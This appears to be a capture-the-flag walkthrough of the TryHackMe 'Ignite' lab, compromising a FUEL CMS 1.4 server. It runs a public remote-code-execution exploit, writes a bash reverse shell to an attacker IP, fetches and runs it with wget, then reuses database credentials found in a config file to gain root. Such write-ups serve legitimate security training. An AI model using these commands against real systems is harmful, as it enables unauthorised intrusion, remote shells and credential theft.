Ignite

tryhackme.com - Β© TryHackMe

Intro

Room Info

πŸ”— Name

🎯 Target IP

10.10.174.21

πŸ“ˆ Difficulty level

🟒Easy

πŸ’² Subscription type

Free

🐧 OS

Linux


Recon

mkdir ignite
cd ignite
nmap -sV -sC -oA nmap_ignite 10.10.174.21
PORT   STATE SERVICE VERSION
80/tcp open  http    Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Welcome to FUEL CMS
| http-robots.txt: 1 disallowed entry
|_/fuel/

πŸ“Œ Found FUEL CMS v. 1.4 on port 80

Local Recon

Navigate to

  • http://10.10.174.21/

  • http://10.10.174.21/fuel

    • admin:admin

Exploitation

  • Search for a Fuel CMS exploit

searchsploit fuel cms
searchsploit -m 50477
less 50477.py

python 50477.py -u http://10.10.174.21

πŸ“Œ Fuel CMS 1.4.1 - Remote Code Execution (3)

whoami

Reverse Shell

ip -br -c a
	10.18.65.48 # my IP
	
subl shell.sh

# Insert this line for a bash reverse shell
/bin/bash -i >& /dev/tcp/10.18.65.48/3333 0>&1
  • Setup a Python web server and a nc listener on 2 different tabs

python -m http.server

nc -nvlp 3333
  • Back in the exploited Fuel CMS Enter Command $

wget http://10.18.65.48:8000/shell.sh -O shell.sh
bash shell.sh
  • 🚩 Reverse shell received in the nc terminal

/usr/bin/script -qc /bin/bash /dev/null
cd /home/www-data
ls
cat flag.txt
6470e***************************

Privilege Escalation

  • Enumerate Fuel CMS application

    • /var/www/html/fuel/application/config/

cat /var/www/html/fuel/application/config/database.php
$db['default'] = array(
	'dsn'	=> '',
	'hostname' => 'localhost',
	'username' => 'root',
	'password' => 'mememe',
	'database' => 'fuel_schema',
	'dbdriver' => 'mysqli',
	'dbprefix' => '',
	'pconnect' => FALSE,
	'db_debug' => (ENVIRONMENT !== 'production'),
	'cache_on' => FALSE,
	'cachedir' => '',
	'char_set' => 'utf8',
	'dbcollat' => 'utf8_general_ci',
	'swap_pre' => '',
	'encrypt' => FALSE,
	'compress' => FALSE,
	'stricton' => FALSE,
	'failover' => array(),
	'save_queries' => TRUE
);

πŸ“Œ Found database credentials: root:mememe

  • Try to use those credentials for the root user of the system

su root

whoami
cd
cat root.txt
b9bbc**************************

Last updated

Was this helpful?